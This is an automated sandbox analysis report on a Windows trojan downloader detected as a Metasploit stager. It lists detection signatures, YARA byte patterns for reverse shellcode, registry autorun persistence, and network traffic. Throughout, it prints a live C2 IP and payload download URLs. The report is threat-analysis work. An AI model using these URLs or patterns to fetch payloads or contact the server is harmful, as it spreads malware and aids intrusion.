Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
Analysis ID:	1521496
MD5:	ccf3c480f27db238fa757d0967241817
SHA1:	8067f4e9093dd68fc54a2270c3e4aa6e2e442929
SHA256:	ab963f165c5269b14b0275a2b25f2e1110a7e3ca903324e106701a4167026270
Tags:	exe
Infos:

Detection

Metasploit

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Metasploit Payload

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe" MD5: CCF3C480F27DB238FA757D0967241817)

conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sh-runner.exe (PID: 3096 cmdline: "C:\ProgramData\sh-runner.exe" MD5: D178CD15E8E69662A943BF0A9DA7FF60)

conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sh-runner.exe (PID: 2196 cmdline: "C:\ProgramData\sh-runner.exe" MD5: D178CD15E8E69662A943BF0A9DA7FF60)

conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sh-runner.exe (PID: 5472 cmdline: "C:\ProgramData\sh-runner.exe" MD5: D178CD15E8E69662A943BF0A9DA7FF60)

conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Download", "URL": "http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0x36b:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x311:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0x36b:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x311:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0x36b:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x311:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\sh-runner.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyProgram

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T17:52:15.584063+0200	2028765	3	Unknown Traffic	192.168.2.4	49731	84.201.150.223	8443	TCP
2024-09-28T17:52:26.916639+0200	2028765	3	Unknown Traffic	192.168.2.4	49734	84.201.150.223	8443	TCP
2024-09-28T17:52:34.436379+0200	2028765	3	Unknown Traffic	192.168.2.4	49742	84.201.150.223	8443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Metasploit {"Type": "Metasploit Download", "URL": "http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\sh-runner.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD10EA0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,

2_2_00007FF72BD10EA0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 4x nop then sub rsp, 58h	0_2_00007FF71C8C1D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 4x nop then push rbx	0_2_00007FF71C8C2116
Source: C:\ProgramData\sh-runner.exe	Code function: 4x nop then sub rsp, 58h	2_2_00007FF72BD6AF00

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 84.201.150.223:8443

Source: Joe Sandbox View

ASN Name: YANDEXCLOUDRU YANDEXCLOUDRU

Source: Joe Sandbox View

JA3 fingerprint: 72a589da586844d7f0818ce684948eea

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 84.201.150.223:8443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 84.201.150.223:8443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 84.201.150.223:8443

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223

Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223
Source: unknown	TCP traffic detected without corresponding DNS query: 84.201.150.223

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Code function: 0_2_00007FF71C8C1450 InternetOpenA,InternetOpenA,GetLastError,InternetOpenUrlA,InternetOpenUrlA,GetLastError,InternetCloseHandle,_fsopen,GetLastError,InternetCloseHandle,InternetCloseHandle,fwrite,InternetReadFile,InternetReadFile,fclose,InternetCloseHandle,InternetCloseHandle,

0_2_00007FF71C8C1450

Source: global traffic

HTTP traffic detected: GET /sh-runner.exe HTTP/1.1User-Agent: DownloaderHost: 84.201.150.223Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Content-Length: 243Host: 84.201.150.223

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, ConDrv.0.dr	String found in binary or memory: http://84.201.150.223/sh-runner.exe
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	String found in binary or memory: http://84.201.150.223/sh-runner.exeSaving
Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.201.150.223/sh-runner.exeT
Source: sh-runner.exe, 00000002.00000003.1836656365.000001FF24C51000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000002.00000003.1836829093.000001FF24C9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/&
Source: sh-runner.exe, 00000002.00000003.1836104016.000001FF2307D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownloa
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FFA000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabk
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en2
Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/-
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223//9
Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/4
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/7V
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/;~
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/=
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/?9
Source: sh-runner.exe, 00000002.00000002.3055839319.000001FF24CE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/E8
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/K
Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/X
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/Y
Source: sh-runner.exe, 00000002.00000003.2225218332.000001FF24CD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/g(
Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/p
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/q
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/s
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/u
Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/x
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223/y
Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223:443/
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223:443/P
Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000003.2301836654.00000112CF60C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223:443/X
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE3BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223:443/g
Source: sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223:443/v
Source: sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://84.201.150.223:8443/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaC

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63071
Source: unknown	Network traffic detected: HTTP traffic on port 63069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63065
Source: unknown	Network traffic detected: HTTP traffic on port 63067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63068
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 84.201.150.223:443 -> 192.168.2.4:49743 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown

Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F70020 NtAllocateVirtualMemory,NtProtectVirtualMemory,	2_3_000001FF24F70020
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD10020 RtlNtStatusToDosError,NtOpenFile,RtlNtStatusToDosError,	2_2_00007FF72BD10020
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD11640 GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,NtOpenFile,SetFileInformationByHandle,CloseHandle,RtlNtStatusToDosError,NtOpenFile,RtlNtStatusToDosError,GetLastError,SetFileInformationByHandle,GetLastError,CloseHandle,SwitchToThread,CloseHandle,SwitchToThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetLastError,CloseHandle,memcpy,CloseHandle,CloseHandle,	2_2_00007FF72BD11640
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA36F0 NtAddBootEntry,	2_2_000001FF24FA36F0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA3EF0 NtAddBootEntry,	2_2_000001FF24FA3EF0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA48A0 NtAddBootEntry,	2_2_000001FF24FA48A0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA4050 NtAddBootEntry,	2_2_000001FF24FA4050
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA3830 NtAddBootEntry,	2_2_000001FF24FA3830
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA39E0 NtAddBootEntry,	2_2_000001FF24FA39E0
